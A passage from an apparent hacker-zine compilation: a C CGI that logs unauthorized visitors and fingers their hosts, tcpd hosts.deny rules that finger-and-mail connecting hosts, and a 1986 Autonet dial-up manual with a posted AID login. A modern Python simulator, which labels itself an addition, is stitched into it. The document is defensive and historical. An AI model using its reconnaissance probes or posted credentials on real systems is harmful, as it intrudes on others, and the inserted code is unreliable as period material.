fflush(stdout), fflush(stderr); /* fflush() on an input stream is undefined */

/* Free up our structures before exiting. */
#define FREEALL() free(buf), free(cmdarg), free(address);
/* ------------------ */

int main(void)
{
FILE *tmpfile, *fingerinfo;

int pid;
int fd[2];
register int errors = 0;

char *buf = malloc(4096);
char *cmdarg = malloc(512);
char *address = malloc(256);

char *host = getenv("REMOTE_HOST");
char *addr = getenv("REMOTE_ADDR");
char *user = getenv("REMOTE_USER");
char *ident = getenv("REMOTE_IDENT");
char *browser = getenv("HTTP_USER_AGENT");
char *query_string = getenv("QUERY_STRING");

/* Any of these may be unset (no reverse lookup, no ident, no query, */
/* no credentials presented yet); substitute something printable so */
/* printf() and strcmp() never get a NULL pointer. */
if (addr == NULL) addr = "unknown";
if (host == NULL) host = addr;
if (user == NULL) user = "(none)";
if (ident == NULL) ident = "(none)";
if (browser == NULL) browser = "unknown";
if (query_string == NULL) query_string = "";


/* We check each malloc seperately so we can free */
/* any previously malloc()'d buffers. */
if (buf == NULL) {
perror("malloc");
PRNSERVERR();
exit(ERROR);
} else memset(buf, 0, 4096); /* sizeof(buf) is the pointer's size, not the buffer's */

if (cmdarg == NULL) {
perror("malloc");
PRNSERVERR();
free(buf);
exit(ERROR);
} else memset(cmdarg, 0, 512);

if (address == NULL) {
perror("malloc");
PRNSERVERR();
free(buf), free(cmdarg);
exit(ERROR);
} else memset(address, 0, 256);
/* ----------------------------- */


if (pipe(fd) == ERROR) {
perror("pipe");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

memset(buf, 0, 4096);

if ((pid = fork()) == ERROR) {

openlog("httpd: unauthorized.cgi", LOG_PID, LOG_USER);
syslog(LOG_ERR, "Unable to fork().");
closelog();

PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) {
close(fileno(stdout)), close(fileno(stderr)), close(fd[0]);
dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */
dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

sprintf(address, "@%.*s", 256 - 1, host);

/* Log information. */
printf("The following person got a 401 (unauthorized) from the web server!\n\n");
printf("\tHost: %s\n", host);
printf("\tAddress: %s\n", addr);
printf("\tUser: %s\n", user);
printf("\tIdent: %s\n", ident);
printf("\tBrowser type: %s\n", browser);
printf("\tQuery String (i.e. command entered): %s\n\n", query_string);

printf("Information collected from fingering host (if any):\n");
printf("---------------------------------------------------\n\n");
fflush(stdout);

if ((strcmp(addr, IP) != 0) && (strcmp(addr, "127.0.0.1") != 0))
execl(FINGERPROG, "finger", address, (char *)NULL);
else
printf("[from the local host (%s)]\n", IP);

printf(".\n"); /* Terminate 'mail'. */
/* --------------- */

FREEALL();
exit(0);
} else {
/* Parent: keep stdout for the HTTP reply and stderr for the server's */
/* error log. The pipe's read end becomes our stdin so the mail child */
/* inherits it; the write end is closed so the pipe reaches EOF as soon */
/* as the logging child is done (the old code dup2()'d the already */
/* closed fd[1] onto stderr, which silently failed). */
close(fd[1]);
dup2(fd[0], fileno(stdin));
close(fd[0]);

/* Setup the subject to send to mail. It is passed to mail(1) as its */
/* own argv element, so no shell quoting is needed. */
snprintf(cmdarg, 512, "UNAUTHORIZED FROM %s!", host);

/* fork() another child to execute the mail program. It reads from the */
/* pipe while the logging child is still writing, so a long finger */
/* reply cannot fill the pipe and stall both sides. */
if ((pid = fork()) == ERROR) {
perror("fork");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) {
execl(MAILPROG, "mail", "-s", cmdarg, ADMIN, (char *)NULL);
_exit(ERROR); /* only reached if the exec failed */
}

close(fileno(stdin)); /* the parent has no further use for the pipe */
while (wait(NULL) > 0) ; /* reap the logging and mail children before replying */
}

printf("Content-type: text/html\n\n");
printf("<HTML><HEAD>\n");
printf("<TITLE>401 Unauthorized Access</TITLE>\n");
printf("</HEAD><BODY>\n");

printf("<H1>Unauthorized Access</H1>\n");
printf("You are unauthorized to access the requested URL.<P>\n");

printf("</BODY></HTML>\n");

FREEALL();
return 0;
}


Here is my hosts.deny too.........in case you wanted to see it ;)
# "spawn" added: the other rules use the hosts_options form, and with
# that form in effect a bare shell command in the third field is read as
# an (unknown) option name instead of being run.
in.telnetd: ALL: spawn /bin/mail -s "%h tried to telnet in" root

#FINGER - Noisy people
#------------
in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root &

#Security reasons
#---------------
in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root &
in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root &
#in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root &

# PORTMAP
#-------------
portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root &

#COMSAT
# (client list "ALL:" added to the next three rules; without it the spawn
# text itself was being read as the client list and never matched)
in.comsat: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root &

#REXECD
in.rexecd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root &

#RSHD
in.rshd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root &

#NNRPD
in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root &

#RPCBIND
rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root &

#ALL: paranoid


Well.......................................we're winding down to the end.

It has been fun and I don't have much more to say on this article.
Thanks for reading, please feel free to use and distribute this, although
I wish for you to leave my comments and "header" at the tops ... ya know
my "copyright" :)

You can access a few of my things at ftp.w00w00.org or
www.w00w00.org.

Shok (Matt Conover)

Email: shok@dataforce.net, shok@sekurity.org


@HWA


RAW.1 We remember Autonet'86
~~~~~~~~~~~~~~~~~~~~~~

"information wants to be stolen"

- Anonymous


Remember when this was new info? just gleaned from the new uploads
directory of your favourite applecat board pre-ibm and fcp emulex?
well you're probably on the sysadmin side of things now huh? or not
... *g*


===================================================
[ Hacker Supreme's - Hackers Directory Volume # 34 ]
[ Compiled by: Ninja Squirrel and Logan - 5 ]
====================================================

=======================================
[ Hack Copyright: Hacker Supreme 1986 ]
=======================================

[ AUTONET SERIES (Section 1) ]


HOW TO CONNECT TO AUTONET


To establish a connection to Autonet, simply follow the steps
listed below.

1. Dial your local access number and wait for a high-pitched
tone.
NOTE: If you are using a direct-connect terminal, proceed to
Step 3.

2. Switch data set to DATA, or place the telephone receiver firmly
in the acoustic coupler, orienting the cord as indicated.

3. Press the RETURN key two times.

4. Autonet will respond with:

Autonet Line xxxxxxxxxx
Command:

5. Type one or more of the connection dialog commands described
on the following pages. The appropriate C or ID command and
corresponding name or number will be provided to you when you
become an Autonet user. The H and T commands may be used in
conjunction with either of these.


SAMPLE SESSION

User entries are shown in square brackets ([ ]).

[ <CR><CR> ]

Autonet Line 3130157042
Command: [ C NAME;H;T D1 ]

Autonet will respond to this dialog by:

(1) setting the correct parameters for your terminal
model

(2) typing out the connection dialog HELP file

(3) connecting you to your destination and issuing this
message:

CALL CONNECTED


AUTONET CONNECTION DIALOG COMMAND SUMMARY


COMMAND FORMAT   FUNCTION                                     EXAMPLE

C nnnnnnnnnn     Requests a connection to a host whose        C 5555
                 address is nnnnnnnnnn.

C cccccccccc     Requests a connection to a host whose        C NAME
                 name is cccccccccc.

H                Prints this list of commands.                H

ID xxxxxxxxx     Identifies the user and requests a           ID 1234-567
                 connection to the host associated with
                 the user's identity code xxxxxxxxx.

T cn             Identifies a terminal model by the           T D1
                 terminal identity code cn. See the
                 TERMINAL option of AID.

* Use a space to separate a command name and its parameter.

** Use a semicolon (;) to separate commands which
occupy the same line.


AUTONET CONNECTION DIALOG COMMAND DESCRIPTIONS

In all examples, information the user types is shown
in square brackets ([ ]).


The C Command


PURPOSE The C command requests a connection to a subscribing
host computer. The particular host can be specified by a
numerical address, or, through special arrangements, by an
alphabetic name. The terminal session is charged to the
subscribing host.


GENERAL FORM C nnnnnnnnnn

Where:

nnnnnnnnnn is the numeric address assigned by
Autonet to the host computer.

or

C cccccccccc

Where:

cccccccccc is the alphabetic name chosen by the
subscriber for the host computer.


EXAMPLE Autonet Line 3130157042
Command:[ C 5555 ]

CALL CONNECTED

(Proceed with host log-on procedure.)


NOTES If no host exists at the given address or by the
given name, the user will receive the message:

?**No such host.

If the subscribing host will not accept the charges, the user
will receive the message:

?**User ID required.


The ID Command


PURPOSE The ID command identifies the user and requests a
connection to the host associated with that
user's identification code. The network will
require the user to enter a valid password before
completing the connection. The terminal session
is charged to the user.


GENERAL FORM ID xxxxxxxxx

Where:

xxxxxxxxx is an alphanumeric user identification
code.

EXAMPLE Autonet Line 3130157042
Command:[ ID 1234-567 ]
XXXXXXPassword

CALL CONNECTED

(Proceed with host log-on procedure.)


NOTES To connect to a destination other than the
default host, use the C command in conjunction
with the ID command.


EXAMPLE Autonet Line 3130157042
Command:[ ID 2345-12;C 5555 ]
XXXXXXPassword

CALL CONNECTED

Proceed with the host log-on procedure.


The H Command


PURPOSE The H command prints a connection dialog command
summary as a helpful reminder for users. The H
command may be used in conjunction with other
commands, or it may be used as a single command
PRIOR to issuing the C or the ID commands. If
used individually, the network will follow the
summary display with a prompt for another
command.


GENERAL FORM H

EXAMPLE Autonet Line 3130157042
Command:[ H ]
.
.
.

Autonet displays Command Summary.
.
.
.

Command:


EXAMPLE Autonet Line 3130157042
Command:[ H;C 5555 ]

Autonet displays Command Summary.

CALL CONNECTED

(Proceed with host system log-on procedures.)


The T Command


PURPOSE The T command identifies the user's terminal
model so that the network can set certain
operating parameters to optimize the terminal's
characteristics. The T command may be used in
conjunction with other commands, or it may be used
as a single command PRIOR to issuing the C or the
ID commands. If used individually, the network
will establish the correct parameters and will
prompt for another command.


GENERAL FORM T cn

Where:

cn is the alphanumeric code which identifies the
terminal model.

EXAMPLE Autonet Line 3130157042
Command:[ T D1 ]

(Autonet establishes optimal parameters for
terminal model.)

Command:


EXAMPLE Autonet Line 3130157042
Command:[ T D1;C 5555 ]

Autonet sets optimal parameters for terminal
model and requests a connection to host 5555.


NOTES A list of codes for commonly used terminal models
appears in "HOW TO USE AUTONET" and under the
option TERMINAL in Autonet's on-line information
directory, AID. Contact your Autonet Sales
Specialist for further information.
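The connection dialog described above, as an added example that is not part of the original file or of Autonet's own software: a small Python simulator that parses a command line by the manual's rules (a space between a command name and its parameter, a semicolon between commands on one line) and returns the responses the manual documents, including when a connection needs an ID plus password and when the subscribing host pays. The host and user tables, the password-check and "Invalid command" wording, and the billing line are assumptions.

```python
import re

# Constructed tables for the simulation (hypothetical; not real Autonet data).
# HOSTS maps an address or name to whether that subscribing host accepts charges.
HOSTS = {"5555": True, "NAME": True, "7000": False}
# USERS maps an identity code to (password, default host). Sample values only.
USERS = {"1234-567": ("pw-one", "5555"), "2345-12": ("pw-two", "7000")}

ADDR = re.compile(r"[0-9]{1,10}$")     # C nnnnnnnnnn: numeric host address
NAME = re.compile(r"[A-Z]{1,10}$")     # C cccccccccc: alphabetic host name
CODE = re.compile(r"[A-Z0-9-]{1,9}$")  # ID xxxxxxxxx: alphanumeric identity code


def parse_line(line):
    """Split one dialog line into (command, parameter) pairs. A semicolon
    separates commands on the same line; a space separates a command name
    from its parameter. Names and parameters are normalised to upper case."""
    cmds = []
    for part in line.split(";"):
        part = part.strip()
        if part:
            name, _, param = part.partition(" ")
            cmds.append((name.upper(), param.strip().upper()))
    return cmds


def run_dialog(line, password=None):
    """Return the network's responses to one command line, in order.
    The password for an ID command is passed in rather than prompted for."""
    out, user, target = [], None, None
    for name, param in parse_line(line):
        if name == "H":
            out.append("Autonet displays Command Summary.")
        elif name == "T" and param:
            out.append("(Autonet establishes optimal parameters for terminal model.)")
        elif name == "ID" and CODE.match(param):
            if param not in USERS or USERS[param][0] != password:
                return out + ["?**Invalid password."]  # hypothetical wording
            user, target = param, USERS[param][1]     # default host for this user
        elif name == "C" and (ADDR.match(param) or NAME.match(param)):
            target = param                             # C after ID overrides the default
        else:
            return out + ["?**Invalid command."]        # hypothetical wording
    if target is None:                                  # H or T alone: prompt again
        return out + ["Command:"]
    if target not in HOSTS:
        return out + ["?**No such host."]
    if user is None and not HOSTS[target]:              # host will not accept charges
        return out + ["?**User ID required."]
    billed = "user " + user if user else "host " + target
    return out + ["CALL CONNECTED", f"(Session charged to {billed}.)"]
```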

-----------------------------------------------------------------------------
Another Great Directory from Hacker Supreme. (Ninja Squirrel /+\, Logan - 5,)
(Zaphod Breeblebox, Silicon Rat, Lord Vision, Crazy Horse, Lancelot-1.)
-----------------------------------------------------------------------------

==============================================================================
[ ------------------- Infinity-Cartel Alliance Network --------------------- ]
[ The Cartel 1&2 Adventure/AE/BBS 5 meg ------ 206-825-6236, or 206-939-6162 ]
[ Infinity's Edge Adventure/AE/Cat/BBS 10 meg ----------------- 805-683-2725 ]
[ The Center Of Eternity BBS ---------------------------------- 817-496-1777 ]
[ ---------- The Cartel #3 and The Cartel 20 Meg AE coming soon! ----------- ]
==============================================================================


X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

Another file downloaded from: NIRVANAnet(tm)

& the Temple of the Screaming Electron Jeff Hunter 510-935-5845
Rat Head Ratsnatcher 510-524-3649
Burn This Flag Zardoz 408-363-9766
realitycheck Poindexter Fortran 415-567-7043
Lies Unlimited Mick Freen 415-583-4102

Specializing in conversations, obscure information, high explosives,
arcane knowledge, political extremism, diversive sexuality,
insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.

Full access for first-time callers. We don't want to know who you are,
where you live, or what your phone number is. We are not Big Brother.

"Raw Data for Raw Nerves"

X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X


[ AUTONET SERIES (Section 2) ]

@C 31340

313 40 CONNECTED

Autonet Line 3130158025

Command: H

The Autonet connection dialog commands are:

COMMAND FORMAT   FUNCTION                               EXAMPLE

C nnnnnnnnnn     Requests a connection to a host        C 5555
                 whose address is nnnnnnnnnn.

C cccccccccc     Requests a connection to a host        C NAME
                 whose name is cccccccccc.

H                Prints this list of commands.          H

ID xxxxxxxxx     Identifies the user and requests a     ID 1234-567
                 connection to the host associated
                 with the user's identity code
                 xxxxxxxxx.

T cn             Identifies a terminal model by the     T D1
                 terminal identity code cn. See the
                 TERMINAL option of AID.

* Use a space to separate a command name and its parameter.

** Use a semicolon (;) to separate commands which occupy the same line.

*** To access the Autonet Information Directory (AID):

Type: C ADPNS
Use the account-user number: 1300-7777
Use the password: AID

Command: C ADPNS

ADP Network Services
Account-User Number--1300-7777
Password: AID

Job 45 Sys #161 Line 15825 02:02 EDT (06:02 GMT) Fri 13-Sep-85

*** Welcome to AID - the Autonet Information Directory ***

AID is a free, public database of information about ADP's
value-added network and data communications services. To
obtain a list of your options, please type 'HELP'. Use the
'HELP' command whenever you need assistance.

OPTION: HELP

ACCESS - Third party network access information
AID - Lists how to use AID
AUTOMAIL - Describes ADP's Computer Based Message System
BYE - Exits from network and disconnects terminal
CHANGES - Lists impending phone number changes
CONNECT - Lists network connection procedures
DOCUMENT - Lists Autonet publications
DONE - Exits from network and disconnects terminal
GLOSS - Lists glossary of Autonet communications terms
HELP - Lists this set of options
INTERNATL - International network access information
MESSAGES - Lists network messages
NEWS - Lists Autonet news items and service bulletins
PHONE - Lists network access phone numbers
2400BPS - 2400 Baud dial-up access numbers
TERMINAL - Lists Autonet terminal identity codes
TEST - Network and terminal test programs
TROUBLE - Lists network trouble reporting procedures

OPTION: GLOSS

Align paper and press the RETURN key.

Glossary
Last Updated: July 1985
Last Reviewed: July 1985
3 pages

Autonet Communications Glossary

Access Location
    A city in which Autonet can be accessed through a toll-free
    telephone call.

AHIP
    Asynchronous Host Interface Processor. A communication computer
    that connects a host computer to Autonet.

Asynchronous ASCII Terminal
    A device consisting of a keyboard which represents 128 distinct
    characters (such as upper and lower case alphabetics, numerals,
    punctuation and control characters) and a display screen or
    printing mechanism. The terminal is used to send data to, or
    receive data from, a computer by a start-stop transmission method.

ATC
    Asynchronous Terminal Concentrator. An Autonet network access
    service arrangement which also features local async ports for
    multiple terminals.

Autonet Communication Center
    An Autonet access facility consisting of one or more network nodes.

AutoWATS
    A host interface arrangement for users whose initial data
    communications needs are small. The service provides subscribers
    with value-added WATS service at 50% less than conventional WATS
    lines.

Bit
    The smallest unit of data.

BPS
    Bits Per Second. A rate of speed at which bits are transmitted.

CCITT
    The International Consultative Committee for Telegraphy and
    Telephony of the International Telecommunications Union, which
    recommends industry standards.

Dial Back-up
    A service option which establishes a temporary circuit to route
    around line or node failures.

DTF
    Dedicated Terminal Facility. An Autonet network access service
    arrangement which features a hardwired connection to an access
    port.

Error Detection and Correction Code
    A system which detects transmission errors and causes data to be
    retransmitted until it is received correctly.

Front End Processor
    A device which performs communications processing and certain
    protocol functions before passing data to the host.

HAL
    Host Access Line. A single leased line which supports one
    simultaneous connection between a host computer and a network
    node.

HCF
    Host Communication Facility. A leased communication line which
    connects a host computer to a network node.

Host
    A computer system which processes data, as contrasted to a
    computer used for communications purposes.

Leased Access Channel
    A communication line used to connect client equipment to a port
    at an Autonet Communication Center, or to a concentrator.

Modem
    A device which converts digital signals to analog form for
    transmission over telephone lines.

Node
    An Autonet communication computer which accepts and transmits
    packets, and performs network access and interface functions.

Non Prime Subscription
    A cost-saving Public Dial-In service option featuring reduced
    rates during off-peak business hours.

Packet
    A unit of traffic on a packet-switching network. A packet consists
    of a destination address, special control function characters,
    error detection code, as well as message data, all arranged in a
    special format.

Packet-switching
    Method of transmitting data between client equipment by means of
    formatted packets.

Port
    A communication interface between Autonet and a terminal or host
    computer.

Private Rotary
    A service option which features access to a number of access
    ports through a single private number.

Protocol
    A pre-established order for the transfer of data over a
    communications channel.

Remote Access
    A network connection which establishes communication with data
    processing equipment from a distant location.

Traffic
    Data transmitted between user terminals and host computers via
    Autonet.

Virtual Dedicated Ports
    A billing option which features a flat monthly rate in lieu
